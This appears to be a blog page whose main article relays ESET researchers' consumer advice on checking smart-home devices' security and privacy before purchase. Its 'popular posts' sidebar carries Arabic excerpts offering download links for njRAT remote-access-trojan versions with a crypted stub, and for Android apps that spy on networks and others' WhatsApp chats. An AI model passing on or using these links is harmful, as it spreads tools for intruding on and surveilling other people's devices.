Is that smart device secure, and will it protect your privacy?


 

The decision to introduce a new smart device into your home should come only after you’ve answered these two questions affirmatively: “Will the device improve the quality of my life/fill a need I have?” and “Am I satisfied with the level of security and privacy the manufacturer provides to users?”
 
Unfortunately, users’ needs (and wants) often end up being more important than security and privacy and the answer to that second question is simply ignored. In some cases, though, users want to find the answer to it, but they don’t know where to start.

Researching smart devices

According to ESET researchers, a good first step is to research the device’s potential vulnerabilities, and that can be done by searching online for mentions that include variations of “device name” or “device brand name” in conjunction with terms like “security vulnerability,” “privacy breach,” or “data leak.”
“No device or software is guaranteed secure or without potential vulnerabilities. However, companies can be judged based on how they react to disclosure of vulnerabilities in their products,” the researchers pointed out.
“Some of the devices tested had vulnerabilities that have been dealt with quickly with new software and firmware. Unless such disclosures are promptly acknowledged and the vulnerabilities fixed, choosing an alternate device would be an appropriate response.
Other questions that you want to know the answer to are: Does the manufacturer update the firmware and can it be auto-updated? Can you be notified of the pushed-out update through an app or email? Answers can be found on the manufacturer’s or a vendor’s website, or via Google.
Reading the privacy policy should also be a must.
“Understanding what data is collected, stored or shared will help you make the decision on whether the device should be part of the overall network or kept isolated. And if neither of these is deemed secure, then, of course, don’t purchase,” they advise.
You must know that the search for this information will usually (and unfortunately) take some time and considerable effort.
For example: even though each manufacturer should provide a privacy policy or a similar document explaining how the data captured is collected and used, in practice, these policies are occasionally very vague, hard to read and difficult to locate.

The results of your research should inform your decision

The researchers have provided results unearthed in their own fact-finding missions. They searched for answers to all those questions for some popular products from seven vendors, and shared them in a report.
The list of the products includes:
  • The Amazon Echo (2nd Gen) virtual assistant
  • The D-Link DCH-G020 Connected Home hub
  • The D-Link DCH-S150 Motion Sensors
  • The D-Link DCS-935L and D-Link DCS-2132L cameras
  • The NETAMTO weather station
  • The Nokia Health Body Cardio Scale and the Nokia Health Body+ Scale
  • The Sonos PLAY:1 Wi-Fi-connected speaker
  • The Woerlein Soundmaster Internet Radio IR4000SW
  • The TP Link Smart Plug HS110.
If you’re considering buying one or more of these devices you’re in luck: they did the legwork for you and also added a few tips on how to use these devices safely (or as safely as possible).
If not, you have great examples on what you should look for and take into consideration.
Also, if you’ve already bought a smart device, and plant to continue using it, the researchers offer the following advice:
  • Use caution when sharing data on social networks or with a vendor’s own systems. Sharing your location, device and pattern of usage may give cybercriminals enough data to scam you or start a targeted attack.
  • Voice-controlled intelligent personal assistants are convenient. They are also all-knowing. Think carefully how much you tell your assistant, or how much you ask it to gather on your behalf.

Comments

Post a Comment

Popular posts from this blog

تحميل اصدارات برنامج njRAT لاختراق الاجهزة 2017

Image
تحميل   اصدارات برنامج  njRAT  لاختراق الاجهزة  2017 ---------------------------------------------------------------------------------------------- السلام عليكم ورحمة الله تعالى وبركاته تحميل جميع اصدارات برنامج  njRAT  الشهير لاختراق الاجهزة مع تشفيرة متواضعة  لستب njRAT 5 نتيجة فحص تشفيرة الستب http://pscan.xyz/results.php?id=VbGXRoAJjWiEeSHH الان ناتي الى التحميل njRAT_v0.3.5 للتحميل https://up.top4top.net/downloadf-483nr2oz4-rar.html njRAT_v0.4.1 https://up.top4top.net/downloadf-483nhv6j2-rar.html njRAT_v0.5.0 للتحميل https://up.top4top.net/downloadf-483nihol1-rar.html njRAT-v0.6.4 للتحميل https://up.top4top.net/downloadf-483dr2zk1-rar.html njRAT-v0.7d
Read more

Cybersecurity in 2018: Three predictions and one hope

Image
Effective cybersecurity means keeping a close eye on the threats you currently face, and an even closer eye on the threats to come. As you consider your security strategy and investments for the coming year, here are three key trends that will define the threat landscape in 2018, and one hope for a more effective approach to protection.  Risk will continue to shift from infrastructure to the application layer As web apps have evolved from basic information and ecommerce functionality to full-fledged online services, their code and customer data have made them an increasingly appealing target for hackers. Not only are they accessible via the open Internet—they’re also woefully underprotected, with the application layer drawing only 3 percent of the typical security budget at a time when it accounts for 30 percent of successful breaches, according to Verizon. While an incident of the magnitude of the Equifax breach can hardly be said to have a silver lining...
Read more

أفضل برامج إختراق أجهزه للأندرويد و تجسس على الشبكه و تجسس على الواتس اب و رؤية محاذثات الواتس اب

  التطبيق الاول هو تطبيق Hackode   و هو واحد من أفضل التطبيقات الختراق لاندرويد و هو تطبيق مهم لكل من يريد دخول اختراق الاجهزة و الشبكات حيث يوجد به العديد من الادوات المهمه فى الاختراق و ختبار أمن الشبكات و المواقع Test Penetration یقدم التطبیق المزایا و الامكانات الاتیة: مھام الاستكشاف و الاستطلاع التى تمكنك من معرف الاجھزة المتصلة بالشبكة المحلیة التى تتصل بھا كشف و فحص منافذ الاتصال فى الاجھزة المرطبطة بالشبكة فحص الثغرات فى الانظمة التى تعمل على الشبكة الاسلكیة تتبع الاجھزة و المسارات لمعرفة تخطیط الشبكة التى تتصل بھا و یقدم المزید من مھام الكشف و تحلیل الشبكة و الجھزة المرتبطة بھا وھو جزء اساسى و مھم فى عملیات اختراق الشبكات او فحص تأمینھا و معرفة الثغرات المتوفر للتحميل  http://www.adyou.me/k56f أو من هنا  http://gsurl.in/4alj أو من هنا  http://picocurl.com/1oOw التطبيق الثانى هو تطبيق اختراق الواتساب للأندروید  ھو تطبیق خطیر لاختراق محادثات الواتس اب على الشبكة اللاسلكیة فیمكنك التطبیق من مشاھدة المحادثات التى یجریھا ا...
Read more